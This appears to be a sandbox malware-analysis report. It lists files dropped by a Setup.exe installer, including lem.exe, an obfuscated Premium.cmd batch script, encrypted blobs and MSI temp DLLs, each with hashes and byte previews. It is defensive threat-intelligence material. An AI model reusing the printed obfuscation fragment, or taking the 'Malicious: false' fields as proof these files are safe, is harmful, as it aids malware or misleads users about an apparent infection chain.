Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1021792
Entropy (8bit):	6.608727172078022
Encrypted:	false
SSDEEP:	24576:2Nmq6KGDx4JYKcP/+h0lhSMXl+GGXo8Wea/xwuX:Ymq6KGk/cHrOGGY8Wea/xwuX
MD5:	EE09D6A1BB908B42C05FD0BEEB67DFD2
SHA1:	1EB7C1304B7BCA649C2A5902B18A1EA57CEAA532
SHA-256:	7BBF611F5E2A16439DC8CD11936F6364F6D5CC0044545C92775DA5646AFC7752
SHA-512:	2DD2E4E66D2F2277F031C5F3C829A31C3B29196AB27262C6A8F1896A2113A1BE1687C9E8CD9667B89157F099DFB969EF14AE3EA602D4C772E960BC41D39C3D05
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......ia.p-..#-..#-..#].."!..#].."...#=..":..#=.."<..#=.."b..#].."7..#]..",..#].."...#-..#...#e.."T..#e..",..#e..#,..#-.g#,..#e..",..#Rich-..#........................PE..L.....$g.........."!...).....`...... ........ ...........................................@A............................L...,...@....................Z..`=......\....K..p....................L...... K..@............ ...............................text............................... ..`.rdata....... ......................@..@.data....(..........................@....fptable............................@....rsrc...............................@..@.reloc..\...........................@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MSI7746.tmp

Download File

Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1021792
Entropy (8bit):	6.608727172078022
Encrypted:	false
SSDEEP:	24576:2Nmq6KGDx4JYKcP/+h0lhSMXl+GGXo8Wea/xwuX:Ymq6KGk/cHrOGGY8Wea/xwuX
MD5:	EE09D6A1BB908B42C05FD0BEEB67DFD2
SHA1:	1EB7C1304B7BCA649C2A5902B18A1EA57CEAA532
SHA-256:	7BBF611F5E2A16439DC8CD11936F6364F6D5CC0044545C92775DA5646AFC7752
SHA-512:	2DD2E4E66D2F2277F031C5F3C829A31C3B29196AB27262C6A8F1896A2113A1BE1687C9E8CD9667B89157F099DFB969EF14AE3EA602D4C772E960BC41D39C3D05
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......ia.p-..#-..#-..#].."!..#].."...#=..":..#=.."<..#=.."b..#].."7..#]..",..#].."...#-..#...#e.."T..#e..",..#e..#,..#-.g#,..#e..",..#Rich-..#........................PE..L.....$g.........."!...).....`...... ........ ...........................................@A............................L...,...@....................Z..`=......\....K..p....................L...... K..@............ ...............................text............................... ..`.rdata....... ......................@..@.data....(..........................@....fptable............................@....rsrc...............................@..@.reloc..\...........................@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MSI77E4.tmp

Download File

Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1021792
Entropy (8bit):	6.608727172078022
Encrypted:	false
SSDEEP:	24576:2Nmq6KGDx4JYKcP/+h0lhSMXl+GGXo8Wea/xwuX:Ymq6KGk/cHrOGGY8Wea/xwuX
MD5:	EE09D6A1BB908B42C05FD0BEEB67DFD2
SHA1:	1EB7C1304B7BCA649C2A5902B18A1EA57CEAA532
SHA-256:	7BBF611F5E2A16439DC8CD11936F6364F6D5CC0044545C92775DA5646AFC7752
SHA-512:	2DD2E4E66D2F2277F031C5F3C829A31C3B29196AB27262C6A8F1896A2113A1BE1687C9E8CD9667B89157F099DFB969EF14AE3EA602D4C772E960BC41D39C3D05
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......ia.p-..#-..#-..#].."!..#].."...#=..":..#=.."<..#=.."b..#].."7..#]..",..#].."...#-..#...#e.."T..#e..",..#e..#,..#-.g#,..#e..",..#Rich-..#........................PE..L.....$g.........."!...).....`...... ........ ...........................................@A............................L...,...@....................Z..`=......\....K..p....................L...... K..@............ ...............................text............................... ..`.rdata....... ......................@..@.data....(..........................@....fptable............................@....rsrc...............................@..@.reloc..\...........................@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MSI7A65.tmp

Download File

Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1021792
Entropy (8bit):	6.608727172078022
Encrypted:	false
SSDEEP:	24576:2Nmq6KGDx4JYKcP/+h0lhSMXl+GGXo8Wea/xwuX:Ymq6KGk/cHrOGGY8Wea/xwuX
MD5:	EE09D6A1BB908B42C05FD0BEEB67DFD2
SHA1:	1EB7C1304B7BCA649C2A5902B18A1EA57CEAA532
SHA-256:	7BBF611F5E2A16439DC8CD11936F6364F6D5CC0044545C92775DA5646AFC7752
SHA-512:	2DD2E4E66D2F2277F031C5F3C829A31C3B29196AB27262C6A8F1896A2113A1BE1687C9E8CD9667B89157F099DFB969EF14AE3EA602D4C772E960BC41D39C3D05
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......ia.p-..#-..#-..#].."!..#].."...#=..":..#=.."<..#=.."b..#].."7..#]..",..#].."...#-..#...#e.."T..#e..",..#e..#,..#-.g#,..#e..",..#Rich-..#........................PE..L.....$g.........."!...).....`...... ........ ...........................................@A............................L...,...@....................Z..`=......\....K..p....................L...... K..@............ ...............................text............................... ..`.rdata....... ......................@..@.data....(..........................@....fptable............................@....rsrc...............................@..@.reloc..\...........................@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MSI7A95.tmp

Download File

Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1021792
Entropy (8bit):	6.608727172078022
Encrypted:	false
SSDEEP:	24576:2Nmq6KGDx4JYKcP/+h0lhSMXl+GGXo8Wea/xwuX:Ymq6KGk/cHrOGGY8Wea/xwuX
MD5:	EE09D6A1BB908B42C05FD0BEEB67DFD2
SHA1:	1EB7C1304B7BCA649C2A5902B18A1EA57CEAA532
SHA-256:	7BBF611F5E2A16439DC8CD11936F6364F6D5CC0044545C92775DA5646AFC7752
SHA-512:	2DD2E4E66D2F2277F031C5F3C829A31C3B29196AB27262C6A8F1896A2113A1BE1687C9E8CD9667B89157F099DFB969EF14AE3EA602D4C772E960BC41D39C3D05
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......ia.p-..#-..#-..#].."!..#].."...#=..":..#=.."<..#=.."b..#].."7..#]..",..#].."...#-..#...#e.."T..#e..",..#e..#,..#-.g#,..#e..",..#Rich-..#........................PE..L.....$g.........."!...).....`...... ........ ...........................................@A............................L...,...@....................Z..`=......\....K..p....................L...... K..@............ ...............................text............................... ..`.rdata....... ......................@..@.data....(..........................@....fptable............................@....rsrc...............................@..@.reloc..\...........................@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MSI7B61.tmp

Download File

Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1021792
Entropy (8bit):	6.608727172078022
Encrypted:	false
SSDEEP:	24576:2Nmq6KGDx4JYKcP/+h0lhSMXl+GGXo8Wea/xwuX:Ymq6KGk/cHrOGGY8Wea/xwuX
MD5:	EE09D6A1BB908B42C05FD0BEEB67DFD2
SHA1:	1EB7C1304B7BCA649C2A5902B18A1EA57CEAA532
SHA-256:	7BBF611F5E2A16439DC8CD11936F6364F6D5CC0044545C92775DA5646AFC7752
SHA-512:	2DD2E4E66D2F2277F031C5F3C829A31C3B29196AB27262C6A8F1896A2113A1BE1687C9E8CD9667B89157F099DFB969EF14AE3EA602D4C772E960BC41D39C3D05
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......ia.p-..#-..#-..#].."!..#].."...#=..":..#=.."<..#=.."b..#].."7..#]..",..#].."...#-..#...#e.."T..#e..",..#e..#,..#-.g#,..#e..",..#Rich-..#........................PE..L.....$g.........."!...).....`...... ........ ...........................................@A............................L...,...@....................Z..`=......\....K..p....................L...... K..@............ ...............................text............................... ..`.rdata....... ......................@..@.data....(..........................@....fptable............................@....rsrc...............................@..@.reloc..\...........................@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MSI7B91.tmp

Download File

Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1021792
Entropy (8bit):	6.608727172078022
Encrypted:	false
SSDEEP:	24576:2Nmq6KGDx4JYKcP/+h0lhSMXl+GGXo8Wea/xwuX:Ymq6KGk/cHrOGGY8Wea/xwuX
MD5:	EE09D6A1BB908B42C05FD0BEEB67DFD2
SHA1:	1EB7C1304B7BCA649C2A5902B18A1EA57CEAA532
SHA-256:	7BBF611F5E2A16439DC8CD11936F6364F6D5CC0044545C92775DA5646AFC7752
SHA-512:	2DD2E4E66D2F2277F031C5F3C829A31C3B29196AB27262C6A8F1896A2113A1BE1687C9E8CD9667B89157F099DFB969EF14AE3EA602D4C772E960BC41D39C3D05
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......ia.p-..#-..#-..#].."!..#].."...#=..":..#=.."<..#=.."b..#].."7..#]..",..#].."...#-..#...#e.."T..#e..",..#e..#,..#-.g#,..#e..",..#Rich-..#........................PE..L.....$g.........."!...).....`...... ........ ...........................................@A............................L...,...@....................Z..`=......\....K..p....................L...... K..@............ ...............................text............................... ..`.rdata....... ......................@..@.data....(..........................@....fptable............................@....rsrc...............................@..@.reloc..\...........................@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Nasty

Download File

Process:	C:\Users\user\AppData\Local\Temp\lem.exe
File Type:	data
Category:	dropped
Size (bytes):	60416
Entropy (8bit):	7.996518605218866
Encrypted:	true
SSDEEP:	1536:1pf+3BbLP4Qf9jvvXgRT+w32ozCLhnAEA26bgfAYH:GBJrvXc++2MCLhAkfAYH
MD5:	05FDCA98CA0BD244FC684ECC696900DD
SHA1:	00BEFE192DBE09FA9EB7F8D471446B87A2FA513A
SHA-256:	35921BE7FEB68D8C38092EB5FD5E46E84E2A94EBA996B40B78BDFCED7156CF12
SHA-512:	2601BB5F763B65E13A14802D9B04B3C85EF6C0733CA919AB026C34F570FE83D1FE714CD28160905F16B462CCDADF87E411CB1D21B40AB8D3BAF8CF2B7177ADA8
Malicious:	false
Preview:	...x..W.."..m......0#?X.o..p..J...............n[\|...t..7aM.;.x...r.-..M.7.Y.......>..@.XA..y.Qa....J+...U...Z=.XG...0."o..O.UzT....OG..7;C..Jb.z..9.}..dh.L.@..[.<....+.1..!@.e..R....>....O{...c......<Ly'.-I(f..%l.......EgI.aLIJfI.D2.\.l0h.1....u..0"...y.. ...2/)O.(....v+Yga..r^dm.}..Q.. .A+og.-c..J...._.G..'B.+&....(.1\..H..q.`~..WA........l...}%..;.C!..8.h[..e.\;.L......B...I..UR..^8..Q.qa`Am0..p&.....G.j...I..=..M\....67.pt.j...[.1.].7.Wq>..T...>..+CrX....c...Bc.{.W.j3.g...gPt..R......g.p..\|....[.M...K...[!.m...&-[.9#.+?.....K..f.....9'.%...g..kc..b..r.m.C.Z.qS.j.......Y.e,,..W./.....d..xp..[..j..?.D..N..HFC.c....~5>G..&...:.g..CaFM..M.}3mlEe...8.og..s..._....c.....<0.)^..8....^.y../....xx...."Z.x......M.;.$.T.X...1G.>.p..:.....?k.....@.#.:..O..M.^^faH3....`...%1....{...-....`$....U'.. ..p1<m...`y5g.+.K"8..RE........f.y.......b.....$...z-...m}h.q..m...1;.W.J...B.-.........<..i.z.9.)O......p.....L.G.:9t.....$P.*.......(`..P..kx.1.y......8.B.....

C:\Users\user\AppData\Local\Temp\Paxil

Download File

Process:	C:\Users\user\AppData\Local\Temp\lem.exe
File Type:	data
Category:	dropped
Size (bytes):	70656
Entropy (8bit):	6.549036400348385
Encrypted:	false
SSDEEP:	1536:Y5oQyyk4qt1FqnLUshVkf88nfNk4qqdGYynTDYL7Q+mr9R23:Y5ouYNqnLzAfaBaGdDqeb23
MD5:	AC185420E7B84BA40C727CD04F909A4C
SHA1:	C8CEBB2F7C4F9FF516AC6E7585181D2795DE2D01
SHA-256:	A2FADA2D4AC76FF4EE5A4E7629640F4938C417F5FEEEC32F3928E6464D38E897
SHA-512:	8583C5C6EF956C8BB78ECDFCC2DA011408D754D7C27410BB801BAAC98AF3B45439676DD456553C7B27A2998CE75111F0CBC429B340DB038360C600BAC4EF6C2F
Malicious:	false
Preview:	i....T$..L$8.....L$8........L$........tSj...$\.....$\....]...Y..........$X...P.L$.........L$.......L$......{..............$X...P..$\...P."...YY....d.....$X...P....Y3.f..DZ.....$X...P....Y3.t$..t$2f..DZ.....$X....D$ ..$X....D$$.....f.D$(.D$.P.t$..t$..D$ ........I.......^[..].U.............VW.}.3.h....PWF..H.I.......h..K.P.d...YY..u..=..L.3._..^..]...U..SW....I..=.rL...........}............\|.;G.s.j...\|.I..=.rL..u.....3.Sh.TF..7....L.....I....L.........Sh..K.SP...rL......I.....t6....L....t....5..L.....I.SSh....W....I.....L.2..M....8SSj..5..L.....I.h......\|.I..5..L...H.I...t.S.5..L.....I._3.[]...U..VW.}...?;.u..E.90u.2.....S.].;.} ..+..}...t.;.}......E.;..!...#~!..+...}...t.;.}...+..E.;.}......8.}...;.}...+...}...t.;.}.....;...... ~...+..}...t.;.}...+.;.}..7......[_^].U.. ...............S......P.....Y.............tb......P..u...$.I.......J.....Y3..E.....f..E...........E.3..E.E..E..E.E.....f.E..E.P....I.......[..].U....SV...h.K..M......Q.M...;....u.3..M.. t:..@t1...u.

C:\Users\user\AppData\Local\Temp\Premium

Download File

Process:	C:\Users\user\AppData\Local\Temp\lem.exe
File Type:	ASCII text, with very long lines (1106), with CRLF line terminators
Category:	dropped
Size (bytes):	29001
Entropy (8bit):	5.079408383028201
Encrypted:	false
SSDEEP:	768:FHZ2csXvUgG/aF5ZrhgS7m8PDNnAfdr5sxFHHtQhjcBkwBolAAI7:FHY7XJ8aFnlgIpPFA1r5sxBN24toa7
MD5:	7AC4BC841FD3E8988A581BB6C79322DC
SHA1:	278D4B086A20A240CE8EDF3B00F11DE294660E1E
SHA-256:	CD10921F28566F55002A014469BE61DDEDF1BD4F2160096F6161CE13D2ED2FDB
SHA-512:	7D41526753EBEB2964619C93AF984B1D3A0F926514C185C2D592A0EBFE8E42BA038A9B0A9F7A886DD0561B31292B23992F37021F398470A86F4E425F3A5B0F2A
Malicious:	false
Preview:	Set Lodging=H..fAK-Salad-Forever-Container-Anaheim-Airlines-Attention-..QPSqHimself-Prospect-Configured-Regarded-Requested-Warranty-W-..ewdCeltic-Title-Picked-Ali-Los-Running-Antique-Editor-..JpLimited-Briefing-Covered-Recall-Twenty-Dentists-Hazards-..WtLadder-Eos-Mechanics-Laundry-Fantasy-..svMFar-..Set Florists=i..XBZPetroleum-Respectively-Warming-Increased-Pike-Lite-Little-Pastor-Episode-..dEApr-Easter-Temporary-Lawn-Consists-Bear-Considering-..hpDecrease-Bangkok-Recruitment-Mario-..fTFeeding-Flyer-Leads-Formed-Beautiful-..fPjsRemoving-Burlington-Photograph-Ln-Starting-Hz-Pasta-Transparent-..bPIxOptional-Corner-Mysql-Sciences-Wheels-Nicaragua-..pSHearings-Marco-Troubleshooting-..OUfXGuide-Household-Crimes-Mom-Medicaid-Temporal-Boxed-Gui-Glossary-..Set Pos=Y..SYFaster-Immigrants-Organic-Overseas-Princess-Folks-Scientist-..VaFShows-Hazard-Arc-Surrey-Pursue-Perform-Coat-..IEnLesser-Senegal-Digit-Cleaning-..xnZBRelated-Smoking-Clinical-Nervous-..uuRely-Colleges-Vital-Owner-Elect-Unfortu

C:\Users\user\AppData\Local\Temp\Premium.cmd

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with very long lines (1106), with CRLF line terminators
Category:	dropped
Size (bytes):	29001
Entropy (8bit):	5.079408383028201
Encrypted:	false
SSDEEP:	768:FHZ2csXvUgG/aF5ZrhgS7m8PDNnAfdr5sxFHHtQhjcBkwBolAAI7:FHY7XJ8aFnlgIpPFA1r5sxBN24toa7
MD5:	7AC4BC841FD3E8988A581BB6C79322DC
SHA1:	278D4B086A20A240CE8EDF3B00F11DE294660E1E
SHA-256:	CD10921F28566F55002A014469BE61DDEDF1BD4F2160096F6161CE13D2ED2FDB
SHA-512:	7D41526753EBEB2964619C93AF984B1D3A0F926514C185C2D592A0EBFE8E42BA038A9B0A9F7A886DD0561B31292B23992F37021F398470A86F4E425F3A5B0F2A
Malicious:	false
Preview:	Set Lodging=H..fAK-Salad-Forever-Container-Anaheim-Airlines-Attention-..QPSqHimself-Prospect-Configured-Regarded-Requested-Warranty-W-..ewdCeltic-Title-Picked-Ali-Los-Running-Antique-Editor-..JpLimited-Briefing-Covered-Recall-Twenty-Dentists-Hazards-..WtLadder-Eos-Mechanics-Laundry-Fantasy-..svMFar-..Set Florists=i..XBZPetroleum-Respectively-Warming-Increased-Pike-Lite-Little-Pastor-Episode-..dEApr-Easter-Temporary-Lawn-Consists-Bear-Considering-..hpDecrease-Bangkok-Recruitment-Mario-..fTFeeding-Flyer-Leads-Formed-Beautiful-..fPjsRemoving-Burlington-Photograph-Ln-Starting-Hz-Pasta-Transparent-..bPIxOptional-Corner-Mysql-Sciences-Wheels-Nicaragua-..pSHearings-Marco-Troubleshooting-..OUfXGuide-Household-Crimes-Mom-Medicaid-Temporal-Boxed-Gui-Glossary-..Set Pos=Y..SYFaster-Immigrants-Organic-Overseas-Princess-Folks-Scientist-..VaFShows-Hazard-Arc-Surrey-Pursue-Perform-Coat-..IEnLesser-Senegal-Digit-Cleaning-..xnZBRelated-Smoking-Clinical-Nervous-..uuRely-Colleges-Vital-Owner-Elect-Unfortu

C:\Users\user\AppData\Local\Temp\Recording

Download File

Process:	C:\Users\user\AppData\Local\Temp\lem.exe
File Type:	data
Category:	dropped
Size (bytes):	138240
Entropy (8bit):	6.40294617546759
Encrypted:	false
SSDEEP:	1536:Y6CV21YEsmnq7Cv/+/Coc5m+4Xf8O46895LmNpRGDox2S3hPt8gNpkU5uG3xYwBA:JCV26MqgQTc5F446iYNpK5SB7BJBzLA
MD5:	E03C30773214DB59BDFBB950F16E76FC
SHA1:	910E267F1191D0E9D2B452E17FDD1B440C837198
SHA-256:	BC73025EDCB800214EA4F3B1A441375E25CFD8974F9D33094D43D7CE680C0736
SHA-512:	501C8113396D29409AB48EBB6AB68E5D58C26896224F4C07ECB84DE01A64503E045F8676089172615B5B55CB6C1FBA32C4CA4B60F998E200C37B69D6224BBA14
Malicious:	false
Preview:	integratedintlhandlingwaterproofcbperformtreasurertim..MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R..R..R...C..P.....S.._@..a.._@....._@..g..[j..[..[j..w..R.+.r...........S.._@..S..R...P.....S..RichR.*.........................PE..L......Z.........."...............................@.................................Jo....@...@.......@.........................\|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B.........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Speak

Download File

Process:	C:\Users\user\AppData\Local\Temp\lem.exe
File Type:	data
Category:	dropped
Size (bytes):	64223
Entropy (8bit):	6.965090652910025
Encrypted:	false
SSDEEP:	768:1d0bHazf0Tye4Ur2+9BSCVoyO15DuOKHnrxbxZiUCu2iPaLTQ7Q1tCwqVLwQVn8o:P0uZo2+9BBVgCOa1ZBPaPQaEwo0yv
MD5:	A98E36DA94FEE7235BA0E64150C7FF48
SHA1:	F9DDBC3EA30D065A3E8C4A293D1490B1833FC928
SHA-256:	37D7D818F19DD754B66BF5C6E9AEDE3D05303925DE38F829591A02CF97E6D20D
SHA-512:	BBFAAE8200F2E40D0235711CA3D879C60A3495DA831AE00AD838B08FB27A40DC2A6C4ECCB69AD89F0C25774801166BABBEF812FA729A78B7E10AC24742EA763A
Malicious:	false
Preview:	.+.8uy..w.i...Gw6...P..e'..H.i.....8...].....V.....9.............\|..8.zc.kSY.=..T....'..l.qc:.\|..q.f.U..m;.t..[g...:.'"..Mrlw...~.....MR.X.,.q..,y.....7....Ns`g....(U.....<....P...=.8.[.....2.V.<.....:/..bb..z.+.....[.NT..... .vg.KG.]f.l..9..t....y1ZZZ\|"..{L.yPG..Z..m.r\|o7C.qW.cm..+.\.[..w.[....&.]=.....rlw..6;.T,...G..".....3T5 "}...T.Xl`Y./......OV][..`,[.9....FT.Vg3.vq....wD.orhg..C..:.l...........>U...e.T...V.......(Rm....sW.c1...N09....=.-...gx......IDZ........0..Z...q2U.,+`.....z.......H.Z...~.;.....^..oNpi\|.$\[\|..$7g./.......Z...p.lQXw..........y..\w-.w.M.....K...w.....g..\|...'..+......%X,[.:...... ..=.+.e.#.Nc.'.}...W...c......n..+.l....b...vw..;.t.Q..J.S.a.@.P.>......E........~:\nr..y..&..\|.X..Y...m.$Zyl_..h.Z/V.........."...@.........M..a..._.9{s.7o..sP.Veb~...N:&]}7/`.'.C#..C[;.`.Jn..z..b.""...u..F.....!.o...4...q...V..d....'.>................?Gwu2.......k..<.#..Q........vv.y.@/.V......./.9y....%N^.al..z..3...

C:\Users\user\AppData\Local\Temp\Third

Download File

Process:	C:\Users\user\AppData\Local\Temp\lem.exe
File Type:	data
Category:	dropped
Size (bytes):	59392
Entropy (8bit):	6.592438940182233
Encrypted:	false
SSDEEP:	1536:DiuzNvt5DfExgYR5yiPl/UQ6JP04vDcmrIEVJRF:DNGR5yiPlcQ4NvoWV7F
MD5:	06C3480CDD090D43901BA203C5D70598
SHA1:	8498F092E0F8D676EC4533189BCA3BAD449BB92F
SHA-256:	4BC85D083FA1229EDDC8FE9823CBCF65CE03F192ABF00678B6BFC53688E1BDA2
SHA-512:	ECE2212698C1FB2E5DC11511558FDED1CE46076C7FFD8ECB856F617D5D5F3A68578D43A45E1EF05B3CCC9BF97D14A94C427D167B7D113B97F84C9B1E7EEE9D4E
Malicious:	false
Preview:	...t....t....u..Z....M......>...../.....^]...V...>.....u..~..t.3.^.3.@^.y..u....3..V...j...V.0...Y..^...V..W3.9~.v..F......t.Q......F..$..G;~.r.f.._^.U..V..W.F.9F.uN...j.X;.r...3.F.j.Z.........Q.R....~....Yt..F...t....P.v.W....v........~.j.. .....Y..t..u..g..........3..N..F..<..F._^]...V......I..4....v..U...Y^.y...A.t..@..V...6.....V.5...Y..^...U..E.;A(\|..M.j.j..<....-.U.R.Q P.q(.......M....Pj..u.......u....gJ.Y]...U........e..3.e..S.].V.u.W.C....E.......jN.U.Z.D..j...@..E..C.......f9P.Zuq.....S.Q......@..E..E.PVS..............M..7.....x]...C....f.x.Ou>.A..M........U..K.jN.......B...U....Yj.f9H.Yt..]....y..u......C..D....@.Pj{.F.u...3..3..........~..]............F;.\|.].j..u.Q...........u..u.jz....5.......3..M......_..^[..]...U......8.E.VW.}.3..@..D$ ..I..t$$...t$(.t$,.L$........@..D$..d.L..T$...u9....L$0h.-I..d.L..........L..0...R..L$0.h.L.......L$..T$.;.h.L.u..u.W.u...T..........p...R..D$.......L$..@ .D$..D$..t$.PW.u..D$0P.u..8....xa.t$..L$......L$.;H.\|1.t$..L

C:\Users\user\AppData\Local\Temp\Zum

Download File

Process:	C:\Users\user\AppData\Local\Temp\lem.exe
File Type:	data
Category:	dropped
Size (bytes):	64512
Entropy (8bit):	7.99705892372434
Encrypted:	true
SSDEEP:	1536:2rCWwRqC5gyt+esfDp8iMAakK/DJIxK/XMehFLz:2uWwRXN0eC8pEK/D2xK//
MD5:	5F5127D492D9F1FF3F615D3AE6D06C70
SHA1:	871CE9468718E513073F4AE6885F61D63DD37B94
SHA-256:	8F144DD8BDED3E7B449D388A4C992148BF2FD278B7B56EF426C4A8B7D1624F32
SHA-512:	19A79CC744FFA94D7567FE22CA0426D92F961D7681E48EB31880FB1F6216782C3C0527108CF5985B2539096BD47DF98F2DC1552769F17A19686F9D7F4AC969E3
Malicious:	false
Preview:	.=q....S....?;.R....f..[.J..@.j.0j..!3I..p;.......x.=............h.4...\.J....z`O.Z.@..,.........p.,..2..#....<.v.....LI..0kay...TB.....i!.cK.....o...\|.[.9.M.,x.FO.....a.x..b...T.........H>`.`l.\|.L.'.4qU..$......0;..k..#...~.@...=.O.7]..,.....2)..6.E..[=ltLI......g..<.....g.m.1.u.DZ..k......!.4{.b5q:...\.._..KJ.BN....z.....T.k.i...-.H.o.".cN...;..r..V.1.....[.U!N.]..&R.O.#..7.a..(.R.b....+.D..6.Z.$..g..]..Lu.........n&.TiX..#/...p....c...TS.x.5Y..V.I..Qd8.A0...r..7.16YB..xm.F.r.i...q.D.}M_.>>.....+.F.......9.V{VZ..}...3j.(..S......T...8X2./..7zsT.rN...[..N.T........u..Q.8...d..F8.....M.ix.....a..0.J...^N..........y.......h.u=!.q.@Eg%...)m)..6...H4..]fmo.G....7\AT...%.u.U.....m.#hy_...r{.."...a...c.s....%....p0........!."m...r.l.)...1.....o.#._.-.&...W...i.{../.2.t......}...,;4....e.#.Lh.(6...H...h\|0.t..m......AB<...E.~B...\|%..gd...G....kEZ...../.... #..s..Q..P....!JU.......\|/V.&.....E..?..O#.....rx...(..<U...^G2.....k...m

C:\Users\user\AppData\Local\Temp\lem.exe

Download File

Process:	C:\Users\Public\Desktop\Setup.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1192690
Entropy (8bit):	7.97814839761367
Encrypted:	false
SSDEEP:	24576:Agkb+FVzgbGp2lwg27Rr+4rHSUgAEmEqnWbzv54qtpaxNlZzVWNFKQF5B1yrp:A672a2Q1byLPzB4qaX0Nbyrp
MD5:	82CCD973E00420A4768BC76D2F442F52
SHA1:	893C63DAD01EB0367C11325EFBF8492E193B15C3
SHA-256:	37919954152F36FB936BA48B6418C1172471FF9CC4627A7F3F941353E2C17B91
SHA-512:	CF6404AF60401833F623EE9CD6732C451E97392B18B682A62ADCDDCDEC17A062472C9385B13F585EF2A5A1E9BF1B8424409BE95E1DCE7B8A597124D4E801D599
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t.......B...8............@..........................0............@.................................@.......................R....R...`.......................................................................................text....r.......t.................. ..`.rdata..n+.......,...x..............@..@.data....+..........................@....ndata...................................rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\shi732E.tmp

Download File

Process:	C:\Users\user\Desktop\Setup.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	5038592
Entropy (8bit):	6.043058205786219
Encrypted:	false
SSDEEP:	49152:vVkDvLSkqdbEsuV+ebMh8w+/H8pF/bmlEyGjWvcP1xQ+X7TqVAMPLfQyim8kznsY:2Ll+Mn0WHl9VA2ic/
MD5:	11F7419009AF2874C4B0E4505D185D79
SHA1:	451D8D0470CEDB268619BA1E7AE78ADAE0EBA692
SHA-256:	AC24CCE72F82C3EBBE9E7E9B80004163B9EED54D30467ECE6157EE4061BEAC95
SHA-512:	1EABBBFDF579A93BBB055B973AA3321FC8DC8DA1A36FDE2BA9A4D58E5751DC106A4A1BBC4AD1F425C082702D6FBB821AA1078BC5ADC6B2AD1B5CE12A68058805
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......e.D!...!...!...(.V.C...5..."...5...&...5...)...!......5...:...5... ...5...R...5.:. ...5... ...Rich!...................PE..d...p............." .........D...............................................`M.....'.M...`A........................................@.H.L&....I......@K.H.....I..............@M.....`J:.p.......................(....%..............@.......$.H......................text...4B.......D.................. ..`.wpp_sf.....`.......H.............. ..`.rdata...L......N.................@..@.data...hD...PI......*I.............@....pdata........I......2I.............@..@.didat.......0K.......J.............@....rsrc...H....@K.......J.............@..@.reloc.......@M.. ....L.............@..B........................................................................................................................................................................

C:\Users\user\AppData\Roaming\Lemcorporation\Setup 0.5.1.2\install\Setup.msi

Download File

Process:	C:\Users\user\Desktop\Setup.exe
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Security: 0, Code page: 1252, Revision Number: {E0F293FF-F9D5-4C95-80EE-A8361BF1CA07}, Number of Words: 2, Subject: Setup, Author: Lemcorporation, Name of Creating Application: Setup, Template: ;1033, Comments: This installer database contains the logic and data required to install Setup., Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Thu Dec 5 16:01:21 2024, Last Saved Time/Date: Thu Dec 5 16:01:21 2024, Last Printed: Thu Dec 5 16:01:21 2024, Number of Pages: 450
Category:	dropped
Size (bytes):	2897408
Entropy (8bit):	6.624211501037971
Encrypted:	false
SSDEEP:	49152:6Twz0A+biU50unDNyGAkMmq6KGk/cHrOGGY8Wea/xwuxrrDdQWiP+GrhmI/Yk6iX:pKUBN6TkkHtdQlrh
